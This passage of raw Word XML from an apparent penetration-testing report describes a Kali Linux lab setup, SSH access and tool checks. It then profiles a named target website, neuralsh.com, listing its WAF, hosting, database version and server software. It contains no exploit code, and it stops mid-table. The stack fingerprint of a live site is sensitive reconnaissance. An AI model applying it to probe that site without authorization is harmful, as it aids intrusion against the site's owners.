        <w:t>4.1 Testing Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Before any testing could begin, a dedicated and isolated testing environment was configured to ensure all activities were conducted in a controlled and professional manner. The environment consists of a host machine running Linux Mint 22.1, with a Kali Linux virtual machine deployed inside Oracle VirtualBox 7.0 for isolated penetration testing operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1.1 VirtualBox and Kali Linux Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VirtualBox was selected as the virtualization platform due to its open-source nature and full feature parity with commercial alternatives for this use case. Kali Linux — the industry-standard penetration testing distribution maintained by Offensive Security — was installed as a guest VM with the following specifications:</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Host OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Linux Mint 22.1 (host machine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Virtualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Oracle VirtualBox 7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Guest OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Kali Linux 2024.x (64-bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>RAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4 GB allocated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>40 GB virtual disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Network Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Bridged (enp0s31f6) — shares host network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The network adapter was configured in Bridged mode rather than NAT. Bridged mode places the Kali VM directly on the physical network, giving it its own IP address and allowing it to reach the internet and the target systems directly without any port forwarding configuration. This mirrors the network conditions of a real external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1.2 SSH Remote Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rather than working directly inside the Kali VM's graphical interface, all testing commands were issued from the host machine's terminal via SSH. This approach is standard in professional engagements and allows the assessor to copy commands, view output, and manage files without switching windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After booting the Kali VM, SSH access was established as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Start the Kali VM headlessly from host terminal</w:t>
        <w:br/>
        <w:t>VBoxManage startvm "Kali-Pentest" --type headless</w:t>
        <w:br/>
        <w:br/>
        <w:t># Discover Kali's IP on the local network</w:t>
        <w:br/>
        <w:t>nmap -sn 192.168.18.0/24 | grep -A1 "Kali"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Connect via SSH</w:t>
        <w:br/>
        <w:t>ssh kali@192.168.18.152</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2074577"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig42_ssh_kali.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2074577"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.2: SSH connection to Kali Linux VM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Once SSH was confirmed working, a static IP was assigned to the Kali VM to ensure the address did not change between sessions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># On Kali — edit network config</w:t>
        <w:br/>
        <w:t>sudo nano /etc/network/interfaces</w:t>
        <w:br/>
        <w:t># Set: address 192.168.18.152, netmask 255.255.255.0, gateway 192.168.18.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1.3 Tools Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After the environment was configured, all penetration testing tools were verified to be installed and functional. Kali Linux includes the full suite of required tools by default:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Confirm tool availability</w:t>
        <w:br/>
        <w:t>nmap --version        # Nmap 7.95</w:t>
        <w:br/>
        <w:t>nikto -Version        # Nikto 2.1.6</w:t>
        <w:br/>
        <w:t>dirb --help           # DIRB v2.22</w:t>
        <w:br/>
        <w:t>nuclei -version       # Nuclei 3.x</w:t>
        <w:br/>
        <w:t>msfconsole --version  # Metasploit 6.x</w:t>
        <w:br/>
        <w:t>burpsuite             # Burp Suite Community (GUI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1442824"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig43_tools_verify.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1442824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.3: Tool version verification — Nmap, Nikto, Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.2 Target Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>neuralsh.com (NeuralShield) is an AI-powered search and neural network platform providing image search, text search, category browsing, geolocation-based features, and report submission via a REST API. The main application is built with Nuxt.js (Vue.js Server-Side Rendering) and protected by Cloudflare's Web Application Firewall (WAF).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2644151"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig44_website.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2644151"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.4: neuralsh.com homepage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.2.1 Technology Stack</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nuxt.js (Vue.js SSR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CDN / WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Backend Hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shared cPanel hosting (Cloudways / cprapid.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Network Equipment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MikroTik RouterOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL 8.0.43</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web Server (Backend)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Apache httpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail Transfer Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
